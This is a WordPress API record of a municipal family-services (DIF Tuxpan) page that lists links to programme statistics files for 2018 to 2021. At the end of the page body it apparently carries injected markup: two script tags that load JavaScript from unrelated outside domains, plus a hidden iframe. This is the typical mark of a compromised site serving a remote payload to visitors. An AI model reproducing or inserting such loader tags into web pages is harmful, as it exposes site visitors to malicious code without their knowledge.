{"id":4943,"date":"2019-07-10T13:39:56","date_gmt":"2019-07-10T19:39:56","guid":{"rendered":"https:\/\/diftuxpan.com\/web1\/?page_id=4943"},"modified":"2021-06-09T13:36:05","modified_gmt":"2021-06-09T19:36:05","slug":"estadisticas-que-generen-en-cumplimiento-de-sus-facultades","status":"publish","type":"page","link":"https:\/\/diftuxpan.com\/web1\/estadisticas-que-generen-en-cumplimiento-de-sus-facultades\/","title":{"rendered":"Estad\u00edsticas que Generen en Cumplimiento de sus Facultades"},"content":{"rendered":"<p><span style=\"color: #000000;\">Unidad B\u00e1sica de Rehabilitaci\u00f3n:<\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/07\/Fracci\u00f3n-VI-Inciso-N.pdf\">Personas atendidas en la Unidad B\u00e1sica de Rehabilitaci\u00f3n correspondiente de enero a marzo del 2019<\/a><\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #000000;\">Centro de Atenci\u00f3n Especializada en Terapia Familiar CAETF:<\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/07\/grafica-personas-atendidas-octubre-2018-a-junio-2019.xlsx\">Personas atendidas Octubre 2018 a Junio 2019<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/07\/estadisticas-de-personas-atendidas-de-oct-2018-a-dic-2019.pdf\">Personas atendidas de Octubre <\/a><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/07\/estadisticas-de-personas-atendidas-de-oct-2018-a-dic-2019.pdf\">2018 a Diciembre 2019<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/07\/estadisticas-octubre-2018-a-septiembre-2020.pdf\">Personas atendidas periodo\u00a0 Octubre 2018 a Septiembre 2020 (estad\u00edsticas)<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/07\/estadisticas-de-2018-a-2020.pdf\">Estad\u00edsticas de 2018 a 2020<\/a><\/span><\/p>\n<h5><span style=\"color: #000000;\">2021<\/span><\/h5>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/07\/estadisticas-de-personas-atendidas-durante-el-2021.pdf\">Estad\u00edsticas de Personas Atendidas Periodo Enero- Mayo\u00a0<\/a><\/span><\/p>\n<p><span style=\"color: #000000;\">Departamento de Trabajo Social:<\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/07\/ESTADISTICAS-FRACCION-VI-INCISO-N.pdf\">Estad\u00edsticas de Beneficiarios<\/a><\/span><\/p>\n<p><span style=\"color: #000000;\">C.A.I.C &#8220;Aprende Jugando&#8221;:<\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/07\/Graficas-Ni\u00f1os-Atendidos-2018.pdf\">Ni\u00f1os Atendidos durante 2018<\/a><\/span><\/p>\n<p><span style=\"color: #000000;\">Seguridad Alimentaria :<\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/05\/DEPARTAMENTO-DE-SEGURIDAD-ALIMENTARIA-INFORME-ANUAL18-19.pdf\">Estad\u00edstica de Beneficiarios Programas PAAD , PROALIMNE y DESAYUNOS ESCOLARES\u00a0 periodo Octubre 2018 a Julio 2019<\/a><\/span><\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Unidad B\u00e1sica de Rehabilitaci\u00f3n: Personas atendidas en la Unidad B\u00e1sica de Rehabilitaci\u00f3n correspondiente de enero a marzo del 2019 &nbsp; Centro de Atenci\u00f3n Especializada en Terapia<span class=\"excerpt-hellip\"> [\u2026]<\/span><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages\/4943"}],"collection":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/comments?post=4943"}],"version-history":[{"count":13,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages\/4943\/revisions"}],"predecessor-version":[{"id":4947,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages\/4943\/revisions\/4947"}],"wp:attachment":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/media?parent=4943"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}